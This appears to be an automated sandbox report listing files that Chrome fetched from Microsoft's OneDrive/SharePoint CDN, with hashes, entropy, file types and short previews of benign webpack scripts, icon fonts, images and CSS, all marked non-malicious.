                                                  SHA-256:0797446E2BD2F273B73980C983633E47F90E838803127F4B3C4CC5E51780262D
                                                  SHA-512:3DDD8ED36034551D471BDA4C23028EDC09E6E1658A71336AB3D0CB822C7657E11B931B6D3F706038D2A2A419117982DF7CF8050B766CAF0337FA18D000C9981D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/199.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[199,285,1692],{3192:function(e,t,n){n.d(t,{a:function(){return a}});var a=new(n(0).a)("bundle")}.,3047:function(e,t,n){n.d(t,{a:function(){return a}});var a=new(n(0).a)("shared")}.,2242:function(e,t,n){n.r(t),n.d(t,{DownloaderWithRecents:function(){return u}});var a=n("tslib_102"),i=n("react-lib"),r=n(24),o=n(295),s=n(2671),c=n(83),d=n(32),l=n(104);function u(e){var t=this,n=e.defaultRender,u=(0,a.l7)(e,["defaultRender"]),f=e.itemKeys,p=(0,d.b)(),m=(0,l.c)();return i.useLayoutEffect(function(){if((0,c.isFeatureEnabled)(c.WriteMruSignalWhenMediaDownloaded)){var e=p((0,r.a)(function(e){return f.map(function(t){return e.demandItemFacet(s.oneDriveItemFacet,t)})}));(0,a.Zd)(t,void 0,void 0,function(){var t,n,i,r,s;return(0,a.qr)(this,function(a){switch(a.label){case 0:return[4,m.consumeAsync(o.i.optional)];case 1:if(!(t=a.sent()))return[3,3];for(n=[],i=0,r=e;i<r.length;i++)(s=r[i])&&n.push(t.recordDocumentView(s))
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 11912, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):11912
                                                  Entropy (8bit):7.968259599398078
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:94446D146BDE9A53EEEE642FEB9827EF
                                                  SHA1:7C4A74A01891152B56F5B52EE6774E42147A1CAD
                                                  SHA-256:3E5970851F7278B6A66DCC9359001A0C722BBEAFB7B4262A908612BF367DA2CB
                                                  SHA-512:F4E2BEDFAC87484124848D3D3EC5F45A4D659B05B3E916C9F2C6853183B70878FC215937F186DE22FF9F81610124A9B69E91F718983A0CE3A90659CA5AE17FEE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-15-bd6f8a54.woff
                                                  Preview:wOFF..............WD........................OS/2.......G...`;.q.cmap...P.......R+."%gasp...4............glyf...@..&...H@....head..)@...5...6#...hhea..)x.......$....hmtx..)....Y.... i..loca..)..........D..maxp..*........ ....name..*........O..R.post...t....... ....x.c`a..8...........L..t.!.I.(......@9......VP`p.,.y&...!...X <....C{...x...=K.a...s.....P..5I6....f..@e~.&....(...ji.+H... .. E...y.y..>.K..s....3......mn.7..!..w.26l1.3.$...a...,.f..YVYg.M..a..{.S..cN8..9.\r..f....H...%/...V$.T........U...E...'}..G}...=.V-..Fw..*j..g.....*..u..F.g......{.............x..{yx....3..yAF...lK.$c.*...6....@ ....%$a...B`B. ...M..G.&.}}.kV.Vi.4i_..5..4.K..B7lk.....eC..}}...-.s.s.g.GD ..b.M.HD..B.^..uzm.%|.4}....Ni.=..A.D.O....J.$...D..Y.C..}.P.....l..rxu...:.%...r!RS..0.8..p..@......QG.J.......O~......'.m=..C.b....zv...?>.>....1..s.h0//...~..?>y{G.......dqLu.&h....]..;.l..bl=.u..W.^...j.B...un..f>.o..e~y.N.!....3.`N...I.|j...\2..v...';....y.0.uf9....&!...\........U
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (47992), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):47992
                                                  Entropy (8bit):5.605846858683577
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:CF3402D7483B127DED4069D651EA4A22
                                                  SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                  SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                  SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (10633)
                                                  Category:dropped
                                                  Size (bytes):18832
                                                  Entropy (8bit):5.657786275904342
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DCA3DC8083AD6735DA9CBE95686FFD42
                                                  SHA1:B73AE9F8011BE1C997A43A1FDFD284223C15EE8E
                                                  SHA-256:97F7D2E4F4C97EDB2A7064F8EA943A281A59F48C91E99F35603F65C7A50A592B
                                                  SHA-512:19D406B64ED1AB34AE9D3EF5E695818E5D0C679A112C00B3CC206438C848FB1175AC76C063A39B924836C1B1D1807559554CB1C4F0B29831373A09A5E4AAD69E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[81],{6004:function(e,t,n){n.d(t,{a:function(){return f},b:function(){return p}});var a=n("odsp.util_460"),i=n(85),r="Stream",o=1855,s={FluentUIV9ShimOverallControl:60077,FluentUIV9ShimDefaultButton:60337,FluentUIV9ShimPrimaryButton:60344,FluentUIV9ShimIconButton:60355,FluentUIV9ShimActionButton:60356,FluentUIV9ShimImage:60357,FluentUIV9ShimToggle:60461,FluentUIV9ShimCommandBarButton:60466,FluentUIV9ShimCommandBar:60480,FluentUIV9ShimCommandButton:60501,FluentUIV9ShimTooltipHost:60634,FluentUIV9ShimTooltip:60633,FluentUIV9ShimLink:60405,FluentUIV9ShimStack:60413,FluentUIV9ShimCheckbox:60414,FluentUIV9ShimDialog:60426,FluentUIV9ShimChoiceGroup:60415,FluentUIV9ShimPersona:60419,FluentUIV9ShimFacepile:60569,FluentUIV9ShimPivot:60105,FluentUIV9ShimContextualMenu:60556,FluentUIV9ShimOverlay:60547,FluentUIV9ShimOverflowSet:60555,FluentUIV9ShimIcon:60446,FluentUIV9ShimSpinner:60450,FluentUIV9ShimSlider:60454,FluentUI
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 27376, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):27376
                                                  Entropy (8bit):7.987457135814926
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5BF1A501ADFAA0CF7F2D438D74265457
                                                  SHA1:5F9B1F32D67239653D4A5BCD9A6511B06BE511EF
                                                  SHA-256:DFDCF6ABDA03D842FC0CAFC09FCFAA801B4F437D5E6EC5294EB64D8E80788990
                                                  SHA-512:6C09BFECCCF8067B8F360ADB32CD9F9CF74E2F9D7906B5EA8C5F804AB9501F36E60104DB307F78AE25972262ADD4B21F68826E7112036D87FDEDB85BCDE44078
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-6109c629.woff
                                                  Preview:wOFF......j.................................OS/2.......G...`+Cw.cmap...P.......zh.V1gasp................glyf......_z...4..head..d....5...6#.hhea..d........$....hmtx..d.........0.'cloca..e.........uF..maxp..g ....... ...'name..g8.......O..R.post..j........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px..c....!...X <....N....x...ol.u.... .z.^.~.....0&...A..F.?1....13.C.t.S......l...b.91......&.`..........].z.k..4.:..Q.....<O.}.$..(j.ue..+...`......-....<.+.HxV}L..V.R?VG.Q5.Y...(3/..,x../. .....C!,.[....rX.wB....X......4.3..=..m...!..p.&.4.!C<.O.I9YGB..y..I.%}d.....gd....r.L.i.!...e..5NS.bm.V.......m..[{N.j{.....#.L_.o...[....g._....hM...;.Qd..]F...q.8k.F..1E.Vs..k....i.|....u...jk....h5YA.e..z..k.[.V...S..xI.+... >h{....n.....[s.p.N...3..pF...&.....c._...V..S.S.p..M........t..K'3......I.U.&k...../&..t....y.W...y..y...L..d.f..:L&~713...6.~.&..L~.'.E......U...)..2..Tv.......]r..@~.'. 6.Fy......L.ur=.(?..:..>'..)9.'.*.'/..e?..!|......x3....P..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):47136
                                                  Entropy (8bit):7.993540910526829
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:6B8A7E8B419C5A36FB12A98266D0849D
                                                  SHA1:7CDA6611D700E1FFE0764C81B79225C1FD4C61A4
                                                  SHA-256:E91FEE23BCFAE78B7296D495ABF0358581632B33658231546C952A78547C3C08
                                                  SHA-512:1F9BDF6748EE8A7B234BBEE1016EF830A5C5257D58DF11019BBC926EF4CA293E23CDF857BB3E9AAAA98AED4801E77B63CD6BC1B13DB58E1A7987F992711C0437
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_filter_v3_dark.webp
                                                  Preview:RIFF....WEBPVP8X..............ALPH.z.....m.I...{K...U...".?.....W.^U...I{ .=.....Q(*(....5.ED...X..9,..5..'....^.14..$......m#I......A...X..3.H..u1.d.P...:@..R.n.z.f.33..*ku:/}.....@.6R..7.!a...#&.a..i....d.?.t."9..m....J*....{.3...==.23c.n.@*.RR...1..9f.R..#..l[U$..* Z..s...=..[.$K.$..N....[0@*3.xf...SG.-.........}.....m...q..:.H(.jV.xF.....a.O.+._.......<......k.*..,...!...m`...C...........?..8......../.@W...5.{..[.......;....:.*..q.......Q.R..A~.}Yk..^......D.......l02...sv.p+h.%~Cs...0.^.....LNj:.j.$_<..Oj...1t.Q.f.n.q..m.[.^}.z..Rh..{.Y.&..5.+...T.P.......V.?heJ..a~.............h...,.dX`..+p.~...q.@...^...F....b...........f.........j......?i..zE`v..Wse|..(.I$8.....&..9P~5EG.4.CG.l;5..C.&...%.p... ..((."..uB..[#.KE..RQ.F..,*.......\D).oW4...{...H..$..'.r.7./.'....1_...R.)..h...h.....UX3..../...D[ei.I..8......T<_.r...7.z..N._..B.Bs..zN.(......d.J@r.......~.S..U*p..w^i....Y..."....%...H...A.l.x|U..WY..6.......:.....M/P.Z..0...pP5P
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (11267)
                                                  Category:dropped
                                                  Size (bytes):14407
                                                  Entropy (8bit):5.3175010890920795
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F0E5822D92E596A0BD51C6BE68D3D093
                                                  SHA1:67959DCE0151CB9F76E57284224E586B92680F6B
                                                  SHA-256:D8B8F5C42C46FF1464888C1BF139EB37526456866250DEC3B2B677834F1C9428
                                                  SHA-512:F2D09CC690365BB8B542B59903CF1DFCCAC3C694697ADD6B7F1E79AB52082B02FD40C719E17116B82D447A8D7F1F0FEE7F85C1A1775D25038FBE4B0B4E2FF01E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[0],{5845:function(e,t,n){n.d(t,{a:function(){return U}});var a=n("tslib_102"),i=n("react-lib"),r=n(33),o=n(367),s=n("fui.util_369"),c=n(281),d=n("fui.core_351"),l=n(1489),u=n(7917),f=n(2764),p=n(321),m=n(1735),_=n(1731),h=n(192),b=n(152),g=n(82),v=(0,s.Ww)(function(e,t){return{root:(0,s.J4)(e,t&&{touchAction:"none",selectors:{"& *":{userSelect:"none"}}})}}),y=n(533),S=n(142),D=n(282),I={start:"touchstart",move:"touchmove",stop:"touchend"},x={start:"mousedown",move:"mousemove",stop:"mouseup"},C=function(e){function t(t){var n=e.call(this,t)||this;return n._currentEventType=x,n._events=[],n._onMouseDown=function(e){var t=i.Children.only(n.props.children).props.onMouseDown;return t&&t(e),n._currentEventType=x,n._onDragStart(e)},n._onMouseUp=function(e){var t=i.Children.only(n.props.children).props.onMouseUp;return t&&t(e),n._currentEventType=x,n._onDragStop(e)},n._onTouchStart=function(e){var t=i.Children.only(n
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 17844, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):17844
                                                  Entropy (8bit):7.9804127898648085
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:30062C841E349D94FA6488120D38961C
                                                  SHA1:15BC10A89CCAE5A2801DB026F0F2C440FC945938
                                                  SHA-256:AF091CE21910C117EF71BABA6B6046D7B056B3A03D7FA5346008948F7B607EE9
                                                  SHA-512:F5E1ED49A07F1FDA4C9B9705CA41D44BDF5AA8347B447231FAED2231E0E6725F73E327DD896A7C0051D8037AA26D8F7426C26A2710A8F15EB16A4F347E0DD2AD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-8-5756996f.woff
                                                  Preview:wOFF......E.......{.........................OS/2.......G...`2.u.cmap...P............gasp................glyf......={..k.....head..@p...3...6#.hhea..@........$....hmtx..@....W.......iloca..A.........9..maxp..A........ .r.'name..A........O..R.post..E........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px%......`u,......7..?.x...OH.Q...*E+...J..B..<.....^.n....`....XDD.u.....F...^...."..x.Et..+A...?E<x.3..7.;|..c....mlZMJX'.5.SZ..L....1W,!.R!..<.J.K.4JP^KH.dN.eE6eK qIHR..?...p...7..[..;../JP..x..../.vt..]...F..;D0.......'L...1.Y../.a).....[pp`...g.{a.:.7x...v-_*."..c_.*....)....9=Ye<.C..a.Q...5\.U..b..B.p>?..>.....{.b/g...p..0.G.FQ...L.@q.A..."M.W....X.~...>...E...(@.TG...3r.O/_;...............................x....`..(\.==..zNM.f4g.hF.....-[.|.|.......4..alC..0g0I...B.....6w.6$y..H^...$....L.UUw.H.I..w..tWWW...W_}g.P.....3...4.@..2>.:^........'..g'...B..-P.......S.0.M%;.L:N..<z.R...rC.:.7Q6..J%...D.2.l....T(.I..._....ilV{j<<.....z2.a..W.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):72
                                                  Entropy (8bit):4.241202481433726
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9E576E34B18E986347909C29AE6A82C6
                                                  SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                  SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                  SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text
                                                  Category:downloaded
                                                  Size (bytes):14730
                                                  Entropy (8bit):4.846925666070396
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FE46325BF6167047462E10177C5D208F
                                                  SHA1:B54445BCCC3F97503835D374A8BEEDE48759723D
                                                  SHA-256:E46A8F98BDF831BBDCA0057CD9F046E6454C85478BDE2202A8FAEE6BDBF7B683
                                                  SHA-512:48ABC256D7AFE259A19624518F7C18DEF32759886CCC94FA41D02DEBD2729171ECA2B2621A4DE0B58351D19FDAD33C6D2CA2FB91EB03A1710478143AC76D3F15
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/fabric-cdn-prod_20240610.001/onedrive-assets/onedrive-font-face-definitions.css
                                                  Preview:./* Leelawadee UI (Thai and Lao) does not have a 'light' weight, so we the 'semilight' weight instead. */.@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff2') format('woff2'), url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff') format('woff');. font-weight: 100;. font-style: normal;.}..@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff2') format('woff2'), url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff') format('woff');. font-weight: 300;. font-style: normal;.}..@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-regul
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (5314)
                                                  Category:dropped
                                                  Size (bytes):26769
                                                  Entropy (8bit):5.391632384962596
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:70F5B46ADE9A17096E488AC0940752BF
                                                  SHA1:B4EB60BFDAB6202218454ABC2C2637C5C0461093
                                                  SHA-256:0E503860A5FC7C48C0888702E6332BC541A662010B59B9710FF0465A0F83508A
                                                  SHA-512:FA3D7B29F74F203CD5D3E5FDC489A1DC998E7214CE7EA8D788081D305C6E2C4A4BCF6369EAED599843F6EB3C1E7A18044EC23726BDA6B90912541D8A884B1315
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[52],{4663:function(e,t,n){n.d(t,{a:function(){return O}});var a=n("tslib_102"),i=n("react-lib"),r=n(3),o=n(8),s=n(38),c=n(9),d=n("odsp.util_460"),l=n(45),u=n(34),f=n(6),p=n(15),m=n(4101),_=n(3520),h=n(56),b=n(3517),g=n(41),v=n(66),y=n(352),S=n(5),D=n(11),I=(0,n(19).a)(function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,Promise.all([n.e("ondemand.resx"),n.e(0),n.e(2),n.e(4),n.e(3),n.e(5),n.e(7),n.e(43),n.e(940)]).then(n.bind(n,4291))];case 1:return[2,e.sent().ApproveRejectDialog]}})})}),x=(0,r.c)(function(e,t){var n=t.onContinue,r=t.onCancel,o=t.resolve,s=t.reject,c=(0,a.l7)(t,["onContinue","onCancel","resolve","reject"]);return i.createElement(I,(0,a.W_)({},c,{onContinue:function(e){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(t){switch(t.label){case 0:return n?[4,n(e)]:[3,2];case 1:t.sent(),t.label=2;case 2:r
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):162913
                                                  Entropy (8bit):7.974325240164564
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AD63250D417C50DDFFE294AF75057337
                                                  SHA1:76863EE93960479C7519ACAE5FEC7E5799396E5B
                                                  SHA-256:36B658E80D8825F6B43FF8F67EF5FEC88412CA10F9D2663453AD6FF0984B9D7B
                                                  SHA-512:6D8DC692C422936E5B7B8871A0B0D73E0B86766AA9241DA29D3AA24EF7610E21ED7C8675E340D8A4D27BEB70AABA6C1140A6AE8CD49925B75459287A36D9CBAD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/error/error_offline_dark.png
                                                  Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a...{.IDATx.....,Yr...s"2..o..j...F..[.$..X..0."A.l~...&..L.Q3.1...4..Oc.@.....d.......}.....w...#.>w?../.}....z............?..=.j.U.V.Z.j.U.V.Z....P.Y..}W.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V....j...e...V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z....:.g...].Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.x.j.U.V.Z.j.U..A...?[V..j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U..Z..~..~..U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V.Z.j.U.V...P.Z.j.U..X..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (14250)
                                                  Category:dropped
                                                  Size (bytes):44375
                                                  Entropy (8bit):5.249361911505367
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8AFACE2A692BAEBDA14A9F6970FD90C8
                                                  SHA1:44E50DA26F6FCAA0099C2D313A673E427FCA19F8
                                                  SHA-256:464E5630D95BC0F8DF0130DC0066143595EEAEE36FBCAF28C252CF5A9C2C7970
                                                  SHA-512:FFDFFE8652286B14899741700DC1DFE9343F391653ADFB676B0CCB94B091EB329766D2C92EEA3CB89A80DB1C2EE58753BC5A9FAFE2AF106CAE6E8DB979C98BD5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[79,2037,628],{2488:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i}});var a,i={queued:0,started:1,completed:2,aborted:3,failed:4,none:5};!function(e){e[e.none=0]="none",e[e.other=1]="other",e[e.general=2]="general",e[e.conflict=3]="conflict",e[e.similarNameExists=4]="similarNameExists",e[e.invalidName=5]="invalidName",e[e.fileSize=6]="fileSize",e[e.emptyFileOrFolder=7]="emptyFileOrFolder",e[e.emptyFileOrFolderForDocLib=8]="emptyFileOrFolderForDocLib",e[e.overQuota=9]="overQuota",e[e.accessDenied=10]="accessDenied",e[e.lockMismatch=11]="lockMismatch",e[e.overQuotaSharedFolder=12]="overQuotaSharedFolder",e[e.folderUploadNotSupported=13]="folderUploadNotSupported",e[e.versionMismatch=14]="versionMismatch",e[e.authFailure=15]="authFailure",e[e.fileHashMismatch=16]="fileHashMismatch",e[e.targetFolderMissing=17]="targetFolderMissing",e[e.itemNotFound=18]="itemNotFound",e[e.malwareDetected=19]="m
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (41517)
                                                  Category:dropped
                                                  Size (bytes):145425
                                                  Entropy (8bit):5.560042416992004
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:63C5F0E2FE9D26E098690C714FB82D1B
                                                  SHA1:CF9CF95757E054960E52E316BDA28749B74F3CEC
                                                  SHA-256:9E11CB1FDFF799046A68FEAE76B9913E009CE9C606C721C3A2065B066DBD000C
                                                  SHA-512:C0FC3C2BA36A06985C6719EEBC5B7F3DC39B681A90B58CE3BF620A1EFFB31DDA8623E0B3129FD41EB9DAC400650A7554526B7A9380FBE4E455C0104977D97971
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview://BuildVersion 1.20240906.4.0.var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_bootstrapper_start"),function(){var e,t,n,a,r={7695:function(e){e.exports="data:font/woff;charset=utf-8;base64,d09GRgABAAAAAAmoAA4AAAAAExwAA5R8AAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABRAAAAEgAAABgMWd7ZGNtYXAAAAGMAAAAPQAAAVLnkt3NY3Z0IAAAAcwAAAAgAAAAKgnZCa9mcGdtAAAB7AAAAPAAAAFZ/J7mjmdhc3AAAALcAAAADAAAAAwACAAbZ2x5ZgAAAugAAAGhAAADZMkacS9oZWFkAAAEjAAAADIAAAA2AQjyc2hoZWEAAATAAAAAFQAAACQQAQgDaG10eAAABNgAAAAMAAAADA0qASZsb2NhAAAE5AAAAAoAAAAKAiQA2G1heHAAAATwAAAAHQAAACAAIgIObmFtZQAABRAAAAP4AAAJ+pGb8VNwb3N0AAAJCAAAABQAAAAg/1EAe3ByZXAAAAkcAAAAiQAAANN4vfIOeJxjYGH3YpzAwMrAwDqL1ZiBgVEaQjNfZEhjEuJgZeViZGIEAwYgEGBAAN9gBQUGh+eKXx5wgPkQkgGsjgXCU2BgAADOIQhyeJxjYGBgZoBgGQZGBhDwAfIYwXwWBgMgzQGETAwMzxWfV3958P8/giXxUKKNWxmqCwwY2RhGPAAA9FQPGwAAAHicY9BiCGUoYGhgWMXIwNjA7MB4gMEBiwgQAACqHAeVeJxdj79Ow0AM
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 2524, version 4.-22282
                                                  Category:downloaded
                                                  Size (bytes):2524
                                                  Entropy (8bit):7.618213756571514
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E584E160AA097D164ABF9AE6D7DFD291
                                                  SHA1:72389F2E647146C37219E9E08508EDFFF48DD99F
                                                  SHA-256:BA4E0CBDDF9AE44844DB7FE4263E61E3E155F7C8A809FB25D7336755C436786E
                                                  SHA-512:8E48544F773A0BDFD3C8B68E9A2EBBCB973713FA230B695304E7B3695CA8F2743BEA1C48AE424744CB8B8B64A3CE7E0DC30BCC6FA71EFA94331272AB529461E6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/patch/odsp-patch-icons-33e61432.woff
                                                  Preview:wOFF...............d........................OS/2...D...H...`0.x.cmap.......?...R..-cvt ....... ...*....fpgm...........Y...gasp................glyf..............l/head.......4...6.P.-hhea...........$....hmtx.............*..loca.............\. maxp...(....... ....name...D...........Upost...<....... .Q.|prep...P........x...x.c`a.c......:....Q.B3_dHc..`e.bdb... .`@..`....gM.os.........S``......x.c```f.`..F.......|... ...L....M.x... ...l.,.S....F6....{....x.c.b.e(`h`X.......x............x.]..N.@..s$..'@:!.u*C....K$.%%...J.......n..b.........|.s...|v..G*)V.7........!O.6eaL.yV.e.j..kN..M.h....Lm....-b....p.N.m.v.....U<..#...O.}.K..,V..&...^...L.c.x.....?ug..l9e..Ns.D....D...K........m..A.M....a.....g.P..`....d.............x....j.Q...s.m:....m.@'..t.P+..0..6..H.MV.d.M]d.P.H9.B...]..}.../....n..MigF.8q..x........p.0w.9...@]iU.J....8..C.....>.A..&....PNi..K..J{u......m.....6.e{.?..C"..oM..6~.<..C@.Vc....}........g...3.....g.+Z9*.:....?S.<U.%ih..z..OP.%.tM.t..tM......$.E.6
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (14090)
                                                  Category:dropped
                                                  Size (bytes):14189
                                                  Entropy (8bit):5.176889714277119
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5A46CF1515F5D943EC264170F35D680B
                                                  SHA1:362FB492DADB36B6E018B020442996829336ADBE
                                                  SHA-256:ADBF9D917ECC461444C471BB06C48177AB43BE65CD9D4792DB5D778103BE906D
                                                  SHA-512:FA0366E6BF103754470B6C8512B8E15D11D72E0446015C3D947E2A4B0A8B4BAF47614231062B4CB1B578E090C2D940A08589689BD2E896533BCA40A13AA9DAF1
                                                  Malicious:false
                                                  Reputation:unknown
